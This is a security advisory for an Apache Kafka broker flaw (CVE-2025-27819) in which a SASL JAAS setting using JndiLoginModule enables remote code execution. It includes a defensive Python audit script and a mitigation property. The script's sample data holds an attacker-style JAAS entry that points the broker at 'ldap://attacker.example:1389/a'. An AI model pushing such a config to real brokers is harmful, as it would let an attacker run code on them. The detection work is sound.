GHSA-mcwh-c9pg-xw43: Apache Kafka Deserialization of Untrusted Data vulnerability

In CVE-2023-25194 we announced a remote code execution / denial of service attack against the Kafka Connect API through a SASL JAAS configuration that uses JndiLoginModule. The Kafka Connect API is not the only component exposed to this attack: Apache Kafka brokers have the same vulnerability. To exploit it, the attacker needs to be able to connect to the Kafka cluster and must hold the AlterConfigs permission on the cluster resource, which is what lets them change the brokers' SASL JAAS configuration.

Since Apache Kafka 3.4.0 we have added a system property, -Dorg.apache.kafka.disallowed.login.modules, that blocks the listed login modules from being used in any SASL JAAS configuration; its value is a comma-separated list of login module class names. By default the list contains com.sun.security.auth.module.JndiLoginModule in Apache Kafka 3.4.0, and com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule in Apache Kafka 3.9.1 and 4.0.0. On 3.4.0 through 3.9.0 the default therefore rejects only JndiLoginModule; operators who also want LdapLoginModule rejected on those versions must set the property explicitly to include both class names.
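As an added example (not code from the Apache Kafka project or from this advisory), the Python script below audits sasl.jaas.config values, the kind of setting a caller with AlterConfigs could change per listener, for login modules that the disallowed-modules property rejects, and additionally flags option values that point at a remote LDAP/JNDI provider. The JAAS parser is a simplified one written for this check and is not Kafka's own JaasConfig parser; the configuration map, the listener names and the attacker-style JndiLoginModule entry are constructed samples, and the key names follow Kafka's listener.name.<listener>.<mechanism>.sasl.jaas.config convention.

```python
"""Audit Kafka SASL JAAS configuration values for login modules that
Apache Kafka disallows by default (CVE-2023-25194 / CVE-2025-27819).

Added example, not code from the Apache Kafka project. The JAAS parsing
below is a simplified re-implementation for auditing, not Kafka's own
parser; the sample config map is constructed for the demo."""

import re

# Default contents of -Dorg.apache.kafka.disallowed.login.modules in the
# releases the advisory names.
DISALLOWED_3_4_0 = frozenset({"com.sun.security.auth.module.JndiLoginModule"})
DISALLOWED_3_9_1 = DISALLOWED_3_4_0 | {"com.sun.security.auth.module.LdapLoginModule"}

# Option values that would make the broker JVM contact a remote provider.
_REMOTE_SCHEMES = ("ldap://", "ldaps://", "rmi://", "dns://", "iiop://")

# One JAAS entry: <LoginModule class> <control flag> [option=value ...] ;
_ENTRY_RE = re.compile(
    r"(?P<module>[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*)\s+"
    r"(?P<flag>required|requisite|sufficient|optional)\b"
    r"(?P<opts>[^;]*);",
    re.IGNORECASE,
)
_OPT_RE = re.compile(r'(?P<key>[\w.\-]+)\s*=\s*(?:"(?P<quoted>[^"]*)"|(?P<bare>[^\s;]+))')


def parse_jaas_config(value):
    """Split a sasl.jaas.config string into its login module entries.

    Handles the common 'Class flag key="value" ...;' form, one dict per
    entry with the module class name, control flag and option map."""
    entries = []
    for m in _ENTRY_RE.finditer(value):
        opts = {}
        for o in _OPT_RE.finditer(m.group("opts")):
            opts[o.group("key")] = (o.group("quoted") if o.group("quoted") is not None
                                    else o.group("bare"))
        entries.append({"module": m.group("module"),
                        "flag": m.group("flag").lower(),
                        "options": opts})
    return entries


def audit_jaas_config(value, disallowed=DISALLOWED_3_9_1):
    """Return a list of findings for one sasl.jaas.config value (empty if clean)."""
    findings = []
    for entry in parse_jaas_config(value):
        if entry["module"] in disallowed:
            findings.append("disallowed login module " + entry["module"])
        for key, val in entry["options"].items():
            if val.lower().startswith(_REMOTE_SCHEMES):
                findings.append("option %s points at a remote provider: %s" % (key, val))
    return findings


def audit_broker_configs(configs, disallowed=DISALLOWED_3_9_1):
    """Audit every *.sasl.jaas.config entry in a broker/listener config map.

    `configs` is a plain dict of config name -> value, e.g. parsed from
    server.properties or taken from an AlterConfigs request your tooling is
    about to send. Returns {config_key: [findings]} for keys with findings."""
    report = {}
    for key, value in configs.items():
        if key.endswith("sasl.jaas.config"):
            findings = audit_jaas_config(value, disallowed)
            if findings:
                report[key] = findings
    return report


# Constructed sample config map (not captured from a real cluster).
SAMPLE_CONFIGS = {
    # A legitimate PLAIN listener configuration.
    "listener.name.sasl_plaintext.plain.sasl.jaas.config":
        'org.apache.kafka.common.security.plain.PlainLoginModule required '
        'username="broker" password="broker-secret" user_broker="broker-secret";',
    # What an attacker holding AlterConfigs on the cluster resource would push.
    "listener.name.sasl_plaintext.scram-sha-256.sasl.jaas.config":
        'com.sun.security.auth.module.JndiLoginModule required '
        'user.provider.url="ldap://attacker.example:1389/a" '
        'group.provider.url="ldap://attacker.example:1389/a";',
    # Unrelated broker setting, ignored by the audit.
    "log.retention.hours": "168",
}

if __name__ == "__main__":
    for key, findings in audit_broker_configs(SAMPLE_CONFIGS).items():
        print(key)
        for finding in findings:
            print("  -", finding)
```

Pass DISALLOWED_3_4_0 to audit against the 3.4.0 default list, or your own set to mirror whatever the property is set to on your brokers. Because sasl.jaas.config is a sensitive config, the check is most useful over the brokers' server.properties files and as a gate in front of the tooling that is allowed to call AlterConfigs. Independently of the audit, set the property on every broker JVM, for example through KAFKA_OPTS="-Dorg.apache.kafka.disallowed.login.modules=com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule", so that brokers on 3.4.0 through 3.9.0 reject LdapLoginModule as well as JndiLoginModule.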

CVE-2025-27819 (GitHub Advisory Database, GitHub Reviewed)

Severity: High. Published to the GitHub Advisory Database Jun 10, 2025; updated Jun 10, 2025.

Package: org.apache.kafka:kafka (Maven)

Affected versions: < 3.4.0


References

  • https://nvd.nist.gov/vuln/detail/CVE-2025-27819
  • https://kafka.apache.org/cve-list
  • GHSA-26f8-x7cc-wqpc

